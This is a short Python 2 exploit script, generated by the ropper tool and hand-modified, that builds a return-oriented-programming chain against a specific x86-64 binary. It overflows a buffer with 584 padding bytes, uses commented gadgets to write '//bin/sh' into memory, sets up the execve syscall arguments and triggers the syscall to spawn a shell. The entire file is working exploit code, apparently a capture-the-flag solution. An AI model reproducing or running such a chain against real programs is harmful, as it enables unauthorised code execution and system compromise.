#!/usr/bin/env python
# Generated by ropper ropchain generator #
# Modified by Jedian to work #

from struct import pack

p = lambda x : pack('Q', x)

IMAGE_BASE_0 = 0x0000000000400000 # 462c6d7675a2255f597a0010045981bad855451ed81126ec1c832a2b5efa5edb
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = 'A'*584

# writes /bin/sh to rdx
rop += rebase_0(0x000000000002a9dc) # 0x000000000042a9dc: pop rdx; adc eax, 0xc9900000; ret; 
rop += '//bin/sh'

# saves the address of a writeable area into rax
rop += rebase_0(0x000000000000d974) # 0x000000000040d974: pop rax; ret; 
rop += rebase_0(0x0000000000250510)

#rop += rebase_0(0x00000000000089ea) # 0x00000000004089ea: mov qword ptr [rax], rdx; nop; leave; ret; 
# writes /bin/sh into the writeable area
rop += rebase_0(0x0000000000006ed3) #  0x0000000000406ed3: mov qword ptr [rax], rdx; nop; pop rbp; ret;
rop += 'nothing.'

# write NULL to rdx
rop += rebase_0(0x000000000002a9dc) # 0x000000000042a9dc: pop rdx; adc eax, 0xc9900000; ret; 
rop += p(0x0000000000000000)

# saves the address of the writable area following "/bin/sh"
rop += rebase_0(0x000000000000d974) # 0x000000000040d974: pop rax; ret; 
rop += rebase_0(0x0000000000250518)


#rop += rebase_0(0x00000000000089ea) # 0x00000000004089ea: mov qword ptr [rax], rdx; nop; leave; ret; 
# write NULL after it to terminate the string
rop += rebase_0(0x0000000000006ed3) #  0x0000000000406ed3: mov qword ptr [rax], rdx; nop; pop rbp; ret;
rop += 'nothing.'

# saves into rdi the address of the argument "filename" (/bin/sh) for the execve
rop += rebase_0(0x0000000000036be3) # 0x0000000000436be3: pop rdi; ret; 
rop += rebase_0(0x0000000000250510)

# saves into rsi an address to null for argument "argv[]" for execve
rop += rebase_0(0x000000000001ba7e) # 0x000000000041ba7e: pop rsi; ret; 
rop += rebase_0(0x0000000000250518)

# saves into rdx an address to null for argument "envp[]" for execve
rop += rebase_0(0x000000000002a9dc) # 0x000000000042a9dc: pop rdx; adc eax, 0xc9900000; ret; 
rop += rebase_0(0x0000000000250518)

# saves into rax the code for "execve" syscall (59)
rop += rebase_0(0x000000000000d974) # 0x000000000040d974: pop rax; ret; 
rop += p(0x000000000000003b)

# do the syscall
rop += rebase_0(0x00000000000053ac) # 0x00000000004053ac: syscall; ret; 
print rop
